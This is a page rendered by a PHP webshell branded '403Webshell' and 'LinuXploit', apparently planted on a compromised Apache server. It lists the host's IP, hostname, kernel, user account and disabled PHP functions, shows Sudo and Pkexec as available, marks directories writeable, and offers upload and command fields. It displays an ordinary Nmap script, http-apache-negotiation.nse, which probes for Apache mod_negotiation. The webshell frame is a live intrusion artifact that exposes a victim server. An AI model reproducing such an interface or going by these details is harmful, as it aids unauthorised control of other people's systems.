403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.181
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/share/nmap/scripts/http-apache-negotiation.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"

description = [[
Checks if the target http server has mod_negotiation enabled.  This
feature can be leveraged to find hidden resources and spider a web
site using fewer requests.

The script works by sending requests for resources like index and home 
without specifying the extension. If mod_negotiate is enabled (default 
Apache configuration), the target would reply with content-location header 
containing target resource (such as index.html) and vary header containing 
"negotiate" depending on the configuration. 

For more information, see:
* http://www.wisec.it/sectou.php?id=4698ebdc59d15
* Metasploit auxiliary module 
    /modules/auxiliary/scanner/http/mod_negotiation_scanner.rb
]]

---
-- @usage
-- nmap --script=http-apache-negotiation --script-args http-apache-negotiation.root=/root/ <target>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- |_http-apache-negotiation: mod_negotiation enabled.
--
-- @args http-apache-negotiation.root target web site root. 
--  Defaults to <code>/</code>.

author = "Hani Benhabiles"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"safe", "discovery"}


portrule = shortport.http

action = function(host, port)

	local root = stdnse.get_script_args("http-apache-negotiation.root") or "/"
	
    -- Common default file names. Could add a couple more.
    local files = {
		'robots',
        'index',
        'home',
        'blog'
	}

    for _, file in ipairs(files) do
        local header = http.get(host, port, root .. file).header
        
        -- Matching file. in content-location header
        --  or negotiate in vary header.
        if header["content-location"] and string.find(header["content-location"], file ..".")
            or header["vary"] and string.find(header["vary"], "negotiate")  then
                return "mod_negotiation enabled."
        end
    end
end

Youez - 2016 - github.com/yon3zu
LinuXploit